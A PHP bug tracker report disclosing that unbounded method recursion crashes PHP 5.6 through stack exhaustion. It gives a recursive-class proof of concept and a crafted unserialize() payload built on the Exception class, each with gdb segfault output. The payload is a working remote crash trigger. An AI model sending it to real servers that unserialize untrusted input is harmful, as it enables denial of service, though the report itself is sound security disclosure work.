[2015-06-10 16:42 UTC] andrea dot palazzo at truel dot it

Description:
------------
Hello guys,
I marked this one as "security" because the crash is remotely triggerable (via unserialize()) so I thought you might not want it public, it doesn't seem to be exploitable though.

The problem is relies in how recursive method calls are handled, the number of nested calls a method could perform to itself doesn't seem to be limited, causing an infinite recursion that would result in invalid memory read access due to stack exhaustion.

The POC is trivial:

<?php

Class Dummy{

  public function recursion() {
    $this->recursion();
  }

}

$x = new Dummy;
$x->recursion();

?>

(gdb) r rec.php
Starting program: /usr/bin/php rec.php

Program received signal SIGSEGV, Segmentation fault.
zend_do_fcall_common_helper_SPEC (execute_data=<optimized out>)
    at /build/php5-U_GrmP/php5-5.6.9+dfsg/Zend/zend_vm_execute.h:592
592	in /build/php5-U_GrmP/php5-5.6.9+dfsg/Zend/zend_vm_execute.h

Unfortunately, this is also triggerable remotely by crafting a special serialized object, also using only built-in classes like:

<?php

$e = unserialize('O:9:"Exception":7:{s:17:"'."\0".'Exception'."\0".'string";s:1:"a";s:7:"'."\0".'*'."\0".'code";i:0;s:7:"'."\0".'*'."\0".'file";R:1;s:7:"'."\0".'*'."\0".'line";i:1337;s:16:"'."\0".'Exception'."\0".'trace";a:0:{}s:19:"'."\0".'Exception'."\0".'previous";i:10;s:10:"'."\0".'*'."\0".'message";N;}');

var_dump($e."");

?>

(gdb) r exception.php 
Starting program: /usr/bin/php exception.php

Program received signal SIGSEGV, Segmentation fault.
zend_parse_va_args (num_args=num_args@entry=0, type_spec=0xb0776b "", 
    va=va@entry=0x7fffff7ff058, flags=flags@entry=0)
    at /build/php5-U_GrmP/php5-5.6.9+dfsg/Zend/zend_API.c:827
827	in /build/php5-U_GrmP/php5-5.6.9+dfsg/Zend/zend_API.c

 [2015-08-04 22:22 UTC] stas@php.net